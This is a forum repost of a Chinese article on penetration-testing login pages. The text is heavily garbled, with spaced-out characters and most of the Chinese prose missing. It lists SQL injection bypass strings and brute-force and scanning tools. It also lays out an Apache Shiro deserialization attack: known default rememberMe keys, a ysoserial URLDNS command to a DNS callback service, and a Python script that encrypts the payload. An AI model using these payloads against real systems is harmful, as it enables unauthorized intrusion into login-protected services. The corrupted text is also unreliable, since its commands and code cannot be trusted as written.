[21236] 2020-09-08_登陆页面渗透测试常见的几种思路与总结

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-18
2020-09-08_登陆页面渗透测试常见的几种思路与总结 L e m o n S e c   2 0 2 0 - 0 9 - 0 8 0 x 0 0 A W V S N e s s u s 使 N i k t o A p p s c a n W 3 a f X r a y X r a y 0 x 0 1 - - S Q L 访 ' o r   1 = 1   " o r   " a " = " a 便 访 使         N i k t o   h t t p s : / / z h u a n l a n . z h i h u . c o m / p / 7 0 2 2 5 7 7 5         X r a y     h t t p s : / / c h a i t i n . g i t h u b . i o / x r a y / # /         W 3 a f     h t t p s : / / w w w . f r e e b u f . c o m / c o l u m n / 1 4 5 9 8 4 . h t m l         A p p s c a n   h t t p s : / / z h u a n l a n . z h i h u . c o m / p / 2 8 7 2 9 3 7 1
S Q L
S Q L O r a c l e M y S Q L P a y l o a d B u r p c h a n g e   b o d y   e n c o d i n g p a y l o a d , S Q L S Q L 0 x 0 2   / /
W e b B u r p 使 N m a p 3 3 8 9 S S H , H y d r a h t t p s : / / y q . a l i y u n . c o m / a r t i c l e s / 6 0 8 4 0 6 / h t t p s : / / p a n . b a i d u . c o m / s / 1 m k w n x u 1 9 A q - K E V C W O Z n 9 9 w   b l j 3 A p p 便 R D P :   h t t p s : / / g i t h u b . c o m / f o r y u j i a n / y u j i a n r d p c r a c k B r u t e r :   h t t p s : / / w w w . u e d b o x . c o m / p o s t / 8 4 7 8 / c r j c r j 1 1 2 2 3 3 h t t p : / / t o o l s . m a y t e r . c n / h t t p s : / / g i t h u b . c o m / r o o t p h a n t o m e r / B l a s t i n g _ d i c t i o n a r y G e t s h e l l

0 x 0 3   : h t t p s : / / g i t h u b . c o m / m a u r o s o r i a / d i r s e a r c h   , D i r S e a r c h
h t t p s : / / g i t h u b . c o m / 5 2 s t u / -  
J S J S 西 J S 西 J S J S 访 J S 使 J S F i n d :   h t t p s : / / g i t h u b . c o m / T h r e e z h 1 / J S F i n d e r U R L n m a p N m a p 3 3 8 9 N m a p 使
J S 访 J S 使 N m a p t e s t J S
0 x 0 4   C M S A p a c h e S h i r o y s o s e r i a l . j a r   h t t p s : / / g i t h u b . c o m / f r o h o f f / y s o s e r i a l 4 A v V h m F L U s 0 K T A 3 K p r s d a g = = 2 A v V h d s g U s 0 F S A 3 S D F A d a g = = 2 A v V h d D F C V d f d f D F A d a g = = 3 A v V h m F L U s 0 K T A 3 K p r s d a g = = k P H + b I x k 5 D 2 d e Z i I x c a a a A w G i H p l a m y X l V B 1 1 U X W o l 8 g = = 6 Z m I 6 I 2 j 5 Y + R 5 a S n 5 Z O l A A = = A s f a w f s d f a A a s d W W W = = Z 3 V u c w A A A A A A A A A A A A A A A A = = 6 Z m I 6 I 2 j 5 Y + R 5 a S n 5 Z O l A A = = Z U d s a G J u S m x i b V I 2 Z H c 9 P Q = = 1 Q W L x g + N Y m x r a M o x A X u / I w = = P O C f r o m   C r y p t o . C i p h e r   i m p o r t   A E S f r o m   C r y p t o   i m p o r t   R a n d o m f r o m   b a s e 6 4   i m p o r t   b 6 4 e n c o d e f r o m   b a s e 6 4   i m p o r t   b 6 4 d e c o d e 使 1 j a v a   - j a r   y s o s e r i a l . j a r   U R L D N S   " c e y e . i o b u r p c o l l a b o r a t o r   c l i e n t " > p a y l o a d . d a t B S   =   A E S . b l o c k _ s i z e p a d   =   l a m b d a   s :   s   +   ( B S   -   l e n ( s )   %   B S )   *   c h r ( B S   -   l e n ( s )   %   B S ) d e f   e n c r y p t ( k e y ,   t e x t ) :         I V   =   R a n d o m . n e w ( ) . r e a d ( A E S . b l o c k _ s i z e )         c i p h e r   =   A E S . n e w ( k e y ,   A E S . M O D E _ C B C ,   I V = I V )         d a t a   =   b 6 4 e n c o d e ( I V   +   c i p h e r . e n c r y p t ( p a d ( t e x t ) ) )         r e t u r n   d a t a k e y =   b 6 4 d e c o d e ( ' 2 A v V h d s g U s 0 F S A 3 S D F A d a g = = ' ) p r i n t   e n c r y p t ( k e y ,   o p e n ( ' p a y l o a d . d a t ' , ' r b ' ) . r e a d ( ) )
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则